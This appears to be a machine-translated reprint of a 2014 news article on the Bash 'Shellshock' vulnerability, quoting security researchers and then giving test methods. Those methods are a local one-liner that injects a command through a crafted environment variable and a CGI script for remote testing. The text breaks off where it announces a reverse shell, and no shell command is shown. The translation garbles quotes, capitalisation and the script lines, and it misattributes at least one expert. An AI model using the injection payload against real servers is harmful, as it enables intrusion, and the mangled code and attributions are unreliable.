Bash in Linux finds significant security vulnerability modification methods

Beijing Time September 25 news, Linux users today again got a "surprise"! The Red Hat security team found a cryptic and dangerous security breach in a widely used bash shell in Linux. This vulnerability is referred to as "Bash bugs" or "Shellshock".

When the user is properly accessed, the vulnerability allows the attacker's code to execute as if it were in the shell, which opens the door for a variety of attacks. And, to make it worse, the vulnerability has been in Linux for a long time, so it's easy to patch a Linux machine, but it's almost impossible to patch it all up.

Red hat and Fedora have released patches for this vulnerability. The vulnerability could also affect OS X, but Apple has not yet released a formal patch.

This bash vulnerability may be more dangerous than Heartbleed.

--robert Graham (@ErrataRob) September 24, 2014

Robert David Graham of Red hat compares the vulnerability and Heartbleed, finding that the former is more widely distributed and likely to have a long-term impact on system security. "There is a lot of software interacting with the shell in some way, and we have no way to enumerate all the software that is affected by the vulnerability," Graham wrote in a blog post. According to The Verge, Nicholas Weaver, a researcher at Berkeley ICSI, agrees: "It's very obscure, scary, and it'll be with us for years." ”

Tod Beardsley, Rapid7 engineering manager at Cyber Security, warns that the severity level of the Bash vulnerability is "10", which means it poses the most threat to the user's computer. The level of complexity of bash vulnerabilities is "low", meaning that hackers can use it relatively easily to launch attacks.

In addition, Dan Guido, CEO of network security company Trail of Bits, said the "Heartbleed" vulnerability could allow hackers to monitor users ' computers but not gain control. The way to exploit the bash vulnerability is also simpler-just cut and paste a line of code.

Google security researcher Tavis Ormandy said on Twitter that the patches from Linux system providers appeared to be "incomplete", raising concerns among several security experts. (Zebian/Tan Mingzhu)

This article is reproduced from the Linux China, the original text from The Verge, part of the content has been deleted.

At present, the 360 Security Center should publish "Bash" vulnerability testing methods, while reminding the vast number of Web sites and enterprises to update service security patches in a timely manner, to avoid causing significant risks.

"Bash" vulnerability test method

1), Local test

Env x= ' () {:;}; echo vulnerable ' bash-c ' echo this is a test

2), Remote testing

First, use Bash to write a CGI

root@kali:/usr/lib/cgi-bin# Cat bug.sh

#!/bin/bash

echo "Content-type:text/html"

echo ""

Echo '

Echo '

Echo ' <meta http-equiv= ' Content-type "content=" text/html; Charset=utf-8 ">"

Echo ' <title>PoC</title> '

Echo '

Echo ' <body> '

Echo ' <pre> '

/usr/bin/env

Echo ' </pre> '

Echo ' </body> '

Echo '

Exit 0

Put it in the/usr/lib/cgi-bin and then use curl to access it.

Can print out the environment variable. The description can be accessed normally. Below bounce a shell

Access to see results: